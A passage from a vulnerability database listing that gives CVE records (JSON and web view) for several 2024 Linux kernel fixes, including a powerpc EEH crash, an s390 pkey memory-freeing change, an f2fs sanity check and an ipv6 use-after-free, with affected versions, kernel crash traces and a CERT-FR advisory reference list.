            "url": "https://git.kernel.org/stable/c/4fad7fef847b6028475dd7b4c14fcb82b3e51274"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4bc246d2d60d071314842fa448faa4ed39082aff"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f23c3d1ca9c4b2d626242a4e7e1ec1770447f7b5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/428d940a8b6b3350b282c14d3f63350bde65c48b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a1216e62d039bf63a539bbe718536ec789a853dd"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41064",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:21:59.237031Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:32:58.925Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/powerpc/kernel/eeh_pe.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "8836e1bf5838ac6c08760e0a2dd7cf6410aa7ff3",
              "status": "affected",
              "version": "9b3c76f08122f5efdbe4992a64b8478cc92dd983",
              "versionType": "git"
            },
            {
              "lessThan": "033c51dfdbb6b79ab43fb3587276fa82d0a329e1",
              "status": "affected",
              "version": "9b3c76f08122f5efdbe4992a64b8478cc92dd983",
              "versionType": "git"
            },
            {
              "lessThan": "4fad7fef847b6028475dd7b4c14fcb82b3e51274",
              "status": "affected",
              "version": "9b3c76f08122f5efdbe4992a64b8478cc92dd983",
              "versionType": "git"
            },
            {
              "lessThan": "4bc246d2d60d071314842fa448faa4ed39082aff",
              "status": "affected",
              "version": "9b3c76f08122f5efdbe4992a64b8478cc92dd983",
              "versionType": "git"
            },
            {
              "lessThan": "f23c3d1ca9c4b2d626242a4e7e1ec1770447f7b5",
              "status": "affected",
              "version": "9b3c76f08122f5efdbe4992a64b8478cc92dd983",
              "versionType": "git"
            },
            {
              "lessThan": "428d940a8b6b3350b282c14d3f63350bde65c48b",
              "status": "affected",
              "version": "9b3c76f08122f5efdbe4992a64b8478cc92dd983",
              "versionType": "git"
            },
            {
              "lessThan": "a1216e62d039bf63a539bbe718536ec789a853dd",
              "status": "affected",
              "version": "9b3c76f08122f5efdbe4992a64b8478cc92dd983",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/powerpc/kernel/eeh_pe.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.7"
            },
            {
              "lessThan": "3.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.281",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.223",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.164",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.101",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.42",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.281",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.223",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.164",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.101",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.42",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.11",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/eeh: avoid possible crash when edev-\u003epdev changes\n\nIf a PCI device is removed during eeh_pe_report_edev(), edev-\u003epdev\nwill change and can cause a crash, hold the PCI rescan/remove lock\nwhile taking a copy of edev-\u003epdev-\u003ebus."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-21T09:12:51.379Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/8836e1bf5838ac6c08760e0a2dd7cf6410aa7ff3"
        },
        {
          "url": "https://git.kernel.org/stable/c/033c51dfdbb6b79ab43fb3587276fa82d0a329e1"
        },
        {
          "url": "https://git.kernel.org/stable/c/4fad7fef847b6028475dd7b4c14fcb82b3e51274"
        },
        {
          "url": "https://git.kernel.org/stable/c/4bc246d2d60d071314842fa448faa4ed39082aff"
        },
        {
          "url": "https://git.kernel.org/stable/c/f23c3d1ca9c4b2d626242a4e7e1ec1770447f7b5"
        },
        {
          "url": "https://git.kernel.org/stable/c/428d940a8b6b3350b282c14d3f63350bde65c48b"
        },
        {
          "url": "https://git.kernel.org/stable/c/a1216e62d039bf63a539bbe718536ec789a853dd"
        }
      ],
      "title": "powerpc/eeh: avoid possible crash when edev-\u003epdev changes",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41064",
    "datePublished": "2024-07-29T14:57:26.086Z",
    "dateReserved": "2024-07-12T12:17:45.628Z",
    "dateUpdated": "2025-11-03T22:00:13.274Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42158 (GCVE-0-2024-42158)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:47 – Updated: 2025-05-04 09:24

Title

s390/pkey: Use kfree_sensitive() to fix Coccinelle warnings

Summary

In the Linux kernel, the following vulnerability has been resolved: s390/pkey: Use kfree_sensitive() to fix Coccinelle warnings Replace memzero_explicit() and kfree() with kfree_sensitive() to fix warnings reported by Coccinelle: WARNING opportunity for kfree_sensitive/kvfree_sensitive (line 1506) WARNING opportunity for kfree_sensitive/kvfree_sensitive (line 1643) WARNING opportunity for kfree_sensitive/kvfree_sensitive (line 1770)

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/62151a0acde90823b…
	https://git.kernel.org/stable/c/22e6824622e8a8889…

Impacted products

Vendor

Product

Version

Linux

Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < 62151a0acde90823bdfa991d598c85cf4b1d387d (git)
Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < 22e6824622e8a8889df0f8fc4ed5aea0e702a694 (git)

Linux

Affected: 4.11
Unaffected: 0 , < 4.11 (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:54:32.078Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/62151a0acde90823bdfa991d598c85cf4b1d387d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/22e6824622e8a8889df0f8fc4ed5aea0e702a694"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42158",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:15:02.030879Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:33.882Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/crypto/pkey_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "62151a0acde90823bdfa991d598c85cf4b1d387d",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            },
            {
              "lessThan": "22e6824622e8a8889df0f8fc4ed5aea0e702a694",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/crypto/pkey_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.11"
            },
            {
              "lessThan": "4.11",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/pkey: Use kfree_sensitive() to fix Coccinelle warnings\n\nReplace memzero_explicit() and kfree() with kfree_sensitive() to fix\nwarnings reported by Coccinelle:\n\nWARNING opportunity for kfree_sensitive/kvfree_sensitive (line 1506)\nWARNING opportunity for kfree_sensitive/kvfree_sensitive (line 1643)\nWARNING opportunity for kfree_sensitive/kvfree_sensitive (line 1770)"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:24:22.974Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/62151a0acde90823bdfa991d598c85cf4b1d387d"
        },
        {
          "url": "https://git.kernel.org/stable/c/22e6824622e8a8889df0f8fc4ed5aea0e702a694"
        }
      ],
      "title": "s390/pkey: Use kfree_sensitive() to fix Coccinelle warnings",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42158",
    "datePublished": "2024-07-30T07:47:00.343Z",
    "dateReserved": "2024-07-29T15:50:41.195Z",
    "dateUpdated": "2025-05-04T09:24:22.974Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-44942 (GCVE-0-2024-44942)

Vulnerability from cvelistv5 – Published: 2024-08-26 11:20 – Updated: 2025-07-11 17:20

Title

f2fs: fix to do sanity check on F2FS_INLINE_DATA flag in inode during GC

Summary

In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to do sanity check on F2FS_INLINE_DATA flag in inode during GC syzbot reports a f2fs bug as below: ------------[ cut here ]------------ kernel BUG at fs/f2fs/inline.c:258! CPU: 1 PID: 34 Comm: kworker/u8:2 Not tainted 6.9.0-rc6-syzkaller-00012-g9e4bc4bcae01 #0 RIP: 0010:f2fs_write_inline_data+0x781/0x790 fs/f2fs/inline.c:258 Call Trace: f2fs_write_single_data_page+0xb65/0x1d60 fs/f2fs/data.c:2834 f2fs_write_cache_pages fs/f2fs/data.c:3133 [inline] __f2fs_write_data_pages fs/f2fs/data.c:3288 [inline] f2fs_write_data_pages+0x1efe/0x3a90 fs/f2fs/data.c:3315 do_writepages+0x35b/0x870 mm/page-writeback.c:2612 __writeback_single_inode+0x165/0x10b0 fs/fs-writeback.c:1650 writeback_sb_inodes+0x905/0x1260 fs/fs-writeback.c:1941 wb_writeback+0x457/0xce0 fs/fs-writeback.c:2117 wb_do_writeback fs/fs-writeback.c:2264 [inline] wb_workfn+0x410/0x1090 fs/fs-writeback.c:2304 process_one_work kernel/workqueue.c:3254 [inline] process_scheduled_works+0xa12/0x17c0 kernel/workqueue.c:3335 worker_thread+0x86d/0xd70 kernel/workqueue.c:3416 kthread+0x2f2/0x390 kernel/kthread.c:388 ret_from_fork+0x4d/0x80 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244 The root cause is: inline_data inode can be fuzzed, so that there may be valid blkaddr in its direct node, once f2fs triggers background GC to migrate the block, it will hit f2fs_bug_on() during dirty page writeback. Let's add sanity check on F2FS_INLINE_DATA flag in inode during GC, so that, it can forbid migrating inline_data inode's data block for fixing.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ae00e6536a2dd54b6…
	https://git.kernel.org/stable/c/26c07775fb5dc7435…
	https://git.kernel.org/stable/c/fc01008c92f40015a…

Impacted products

Vendor

Product

Version

Linux

Affected: 98e4da8ca301e062d79ae168c67e56f3c3de3ce4 , < ae00e6536a2dd54b64b39e9a39548870cf835745 (git)
Affected: 98e4da8ca301e062d79ae168c67e56f3c3de3ce4 , < 26c07775fb5dc74351d1c3a2bc3cdf609b03e49f (git)
Affected: 98e4da8ca301e062d79ae168c67e56f3c3de3ce4 , < fc01008c92f40015aeeced94750855a7111b6929 (git)

Linux

Affected: 3.8
Unaffected: 0 , < 3.8 (semver)
Unaffected: 6.6.47 , ≤ 6.6.* (semver)
Unaffected: 6.10.6 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-44942",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:27:26.047934Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:04.269Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/f2fs/gc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ae00e6536a2dd54b64b39e9a39548870cf835745",
              "status": "affected",
              "version": "98e4da8ca301e062d79ae168c67e56f3c3de3ce4",
              "versionType": "git"
            },
            {
              "lessThan": "26c07775fb5dc74351d1c3a2bc3cdf609b03e49f",
              "status": "affected",
              "version": "98e4da8ca301e062d79ae168c67e56f3c3de3ce4",
              "versionType": "git"
            },
            {
              "lessThan": "fc01008c92f40015aeeced94750855a7111b6929",
              "status": "affected",
              "version": "98e4da8ca301e062d79ae168c67e56f3c3de3ce4",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/f2fs/gc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.8"
            },
            {
              "lessThan": "3.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.47",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.47",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.6",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix to do sanity check on F2FS_INLINE_DATA flag in inode during GC\n\nsyzbot reports a f2fs bug as below:\n\n------------[ cut here ]------------\nkernel BUG at fs/f2fs/inline.c:258!\nCPU: 1 PID: 34 Comm: kworker/u8:2 Not tainted 6.9.0-rc6-syzkaller-00012-g9e4bc4bcae01 #0\nRIP: 0010:f2fs_write_inline_data+0x781/0x790 fs/f2fs/inline.c:258\nCall Trace:\n f2fs_write_single_data_page+0xb65/0x1d60 fs/f2fs/data.c:2834\n f2fs_write_cache_pages fs/f2fs/data.c:3133 [inline]\n __f2fs_write_data_pages fs/f2fs/data.c:3288 [inline]\n f2fs_write_data_pages+0x1efe/0x3a90 fs/f2fs/data.c:3315\n do_writepages+0x35b/0x870 mm/page-writeback.c:2612\n __writeback_single_inode+0x165/0x10b0 fs/fs-writeback.c:1650\n writeback_sb_inodes+0x905/0x1260 fs/fs-writeback.c:1941\n wb_writeback+0x457/0xce0 fs/fs-writeback.c:2117\n wb_do_writeback fs/fs-writeback.c:2264 [inline]\n wb_workfn+0x410/0x1090 fs/fs-writeback.c:2304\n process_one_work kernel/workqueue.c:3254 [inline]\n process_scheduled_works+0xa12/0x17c0 kernel/workqueue.c:3335\n worker_thread+0x86d/0xd70 kernel/workqueue.c:3416\n kthread+0x2f2/0x390 kernel/kthread.c:388\n ret_from_fork+0x4d/0x80 arch/x86/kernel/process.c:147\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244\n\nThe root cause is: inline_data inode can be fuzzed, so that there may\nbe valid blkaddr in its direct node, once f2fs triggers background GC\nto migrate the block, it will hit f2fs_bug_on() during dirty page\nwriteback.\n\nLet\u0027s add sanity check on F2FS_INLINE_DATA flag in inode during GC,\nso that, it can forbid migrating inline_data inode\u0027s data block for\nfixing."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-11T17:20:17.578Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ae00e6536a2dd54b64b39e9a39548870cf835745"
        },
        {
          "url": "https://git.kernel.org/stable/c/26c07775fb5dc74351d1c3a2bc3cdf609b03e49f"
        },
        {
          "url": "https://git.kernel.org/stable/c/fc01008c92f40015aeeced94750855a7111b6929"
        }
      ],
      "title": "f2fs: fix to do sanity check on F2FS_INLINE_DATA flag in inode during GC",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-44942",
    "datePublished": "2024-08-26T11:20:46.478Z",
    "dateReserved": "2024-08-21T05:34:56.665Z",
    "dateUpdated": "2025-07-11T17:20:17.578Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-44987 (GCVE-0-2024-44987)

Vulnerability from cvelistv5 – Published: 2024-09-04 19:54 – Updated: 2025-11-03 22:14

Title

ipv6: prevent UAF in ip6_send_skb()

Summary

In the Linux kernel, the following vulnerability has been resolved: ipv6: prevent UAF in ip6_send_skb() syzbot reported an UAF in ip6_send_skb() [1] After ip6_local_out() has returned, we no longer can safely dereference rt, unless we hold rcu_read_lock(). A similar issue has been fixed in commit a688caa34beb ("ipv6: take rcu lock in rawv6_send_hdrinc()") Another potential issue in ip6_finish_output2() is handled in a separate patch. [1] BUG: KASAN: slab-use-after-free in ip6_send_skb+0x18d/0x230 net/ipv6/ip6_output.c:1964 Read of size 8 at addr ffff88806dde4858 by task syz.1.380/6530 CPU: 1 UID: 0 PID: 6530 Comm: syz.1.380 Not tainted 6.11.0-rc3-syzkaller-00306-gdf6cbc62cc9b #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/06/2024 Call Trace: <TASK> __dump_stack lib/dump_stack.c:93 [inline] dump_stack_lvl+0x241/0x360 lib/dump_stack.c:119 print_address_description mm/kasan/report.c:377 [inline] print_report+0x169/0x550 mm/kasan/report.c:488 kasan_report+0x143/0x180 mm/kasan/report.c:601 ip6_send_skb+0x18d/0x230 net/ipv6/ip6_output.c:1964 rawv6_push_pending_frames+0x75c/0x9e0 net/ipv6/raw.c:588 rawv6_sendmsg+0x19c7/0x23c0 net/ipv6/raw.c:926 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg+0x1a6/0x270 net/socket.c:745 sock_write_iter+0x2dd/0x400 net/socket.c:1160 do_iter_readv_writev+0x60a/0x890 vfs_writev+0x37c/0xbb0 fs/read_write.c:971 do_writev+0x1b1/0x350 fs/read_write.c:1018 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f936bf79e79 Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f936cd7f038 EFLAGS: 00000246 ORIG_RAX: 0000000000000014 RAX: ffffffffffffffda RBX: 00007f936c115f80 RCX: 00007f936bf79e79 RDX: 0000000000000001 RSI: 0000000020000040 RDI: 0000000000000004 RBP: 00007f936bfe7916 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 00007f936c115f80 R15: 00007fff2860a7a8 </TASK> Allocated by task 6530: kasan_save_stack mm/kasan/common.c:47 [inline] kasan_save_track+0x3f/0x80 mm/kasan/common.c:68 unpoison_slab_object mm/kasan/common.c:312 [inline] __kasan_slab_alloc+0x66/0x80 mm/kasan/common.c:338 kasan_slab_alloc include/linux/kasan.h:201 [inline] slab_post_alloc_hook mm/slub.c:3988 [inline] slab_alloc_node mm/slub.c:4037 [inline] kmem_cache_alloc_noprof+0x135/0x2a0 mm/slub.c:4044 dst_alloc+0x12b/0x190 net/core/dst.c:89 ip6_blackhole_route+0x59/0x340 net/ipv6/route.c:2670 make_blackhole net/xfrm/xfrm_policy.c:3120 [inline] xfrm_lookup_route+0xd1/0x1c0 net/xfrm/xfrm_policy.c:3313 ip6_dst_lookup_flow+0x13e/0x180 net/ipv6/ip6_output.c:1257 rawv6_sendmsg+0x1283/0x23c0 net/ipv6/raw.c:898 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg+0x1a6/0x270 net/socket.c:745 ____sys_sendmsg+0x525/0x7d0 net/socket.c:2597 ___sys_sendmsg net/socket.c:2651 [inline] __sys_sendmsg+0x2b0/0x3a0 net/socket.c:2680 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f Freed by task 45: kasan_save_stack mm/kasan/common.c:47 [inline] kasan_save_track+0x3f/0x80 mm/kasan/common.c:68 kasan_save_free_info+0x40/0x50 mm/kasan/generic.c:579 poison_slab_object+0xe0/0x150 mm/kasan/common.c:240 __kasan_slab_free+0x37/0x60 mm/kasan/common.c:256 kasan_slab_free include/linux/kasan.h:184 [inline] slab_free_hook mm/slub.c:2252 [inline] slab_free mm/slub.c:4473 [inline] kmem_cache_free+0x145/0x350 mm/slub.c:4548 dst_destroy+0x2ac/0x460 net/core/dst.c:124 rcu_do_batch kernel/rcu/tree.c:2569 [inline] rcu_core+0xafd/0x1830 kernel/rcu/tree. ---truncated---

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/571567e0277008459…
	https://git.kernel.org/stable/c/ce2f6cfab2c637d0b…
	https://git.kernel.org/stable/c/cb5880a0de12c7f61…
	https://git.kernel.org/stable/c/24e93695b1239fbe4…

CERTFR-2024-AVI-1013

Solutions

Action not permitted

CERTFR-2024-AVI-1013

Solutions

CVE-2024-46714 (GCVE-0-2024-46714)

CVE-2024-46738 (GCVE-0-2024-46738)

CVE-2024-46743 (GCVE-0-2024-46743)

CVE-2024-42245 (GCVE-0-2024-42245)

CVE-2022-48733 (GCVE-0-2022-48733)

CVE-2024-43871 (GCVE-0-2024-43871)

CVE-2024-39472 (GCVE-0-2024-39472)

CVE-2024-42118 (GCVE-0-2024-42118)

CVE-2024-42296 (GCVE-0-2024-42296)

CVE-2024-46832 (GCVE-0-2024-46832)

CVE-2024-42311 (GCVE-0-2024-42311)

CVE-2024-25741 (GCVE-0-2024-25741)

CVE-2024-42067 (GCVE-0-2024-42067)

CVE-2024-42248 (GCVE-0-2024-42248)

CVE-2024-44974 (GCVE-0-2024-44974)

CVE-2024-41067 (GCVE-0-2024-41067)

CVE-2024-46679 (GCVE-0-2024-46679)

CVE-2024-42290 (GCVE-0-2024-42290)

CVE-2024-43828 (GCVE-0-2024-43828)

CVE-2024-41051 (GCVE-0-2024-41051)

CVE-2024-44986 (GCVE-0-2024-44986)

CVE-2024-41090 (GCVE-0-2024-41090)

CVE-2024-41039 (GCVE-0-2024-41039)

CVE-2024-46724 (GCVE-0-2024-46724)

CVE-2024-45009 (GCVE-0-2024-45009)

CVE-2024-47667 (GCVE-0-2024-47667)

CVE-2024-42132 (GCVE-0-2024-42132)

CVE-2024-44966 (GCVE-0-2024-44966)

CVE-2024-42063 (GCVE-0-2024-42063)

CVE-2024-44969 (GCVE-0-2024-44969)

CVE-2024-42283 (GCVE-0-2024-42283)

CVE-2024-38611 (GCVE-0-2024-38611)

CVE-2024-44985 (GCVE-0-2024-44985)

CVE-2024-42312 (GCVE-0-2024-42312)

CVE-2024-39494 (GCVE-0-2024-39494)

CVE-2024-45018 (GCVE-0-2024-45018)

CVE-2024-26661 (GCVE-0-2024-26661)

CVE-2024-43839 (GCVE-0-2024-43839)

CVE-2024-42302 (GCVE-0-2024-42302)

CVE-2024-43882 (GCVE-0-2024-43882)

CVE-2024-43846 (GCVE-0-2024-43846)

CVE-2024-46814 (GCVE-0-2024-46814)

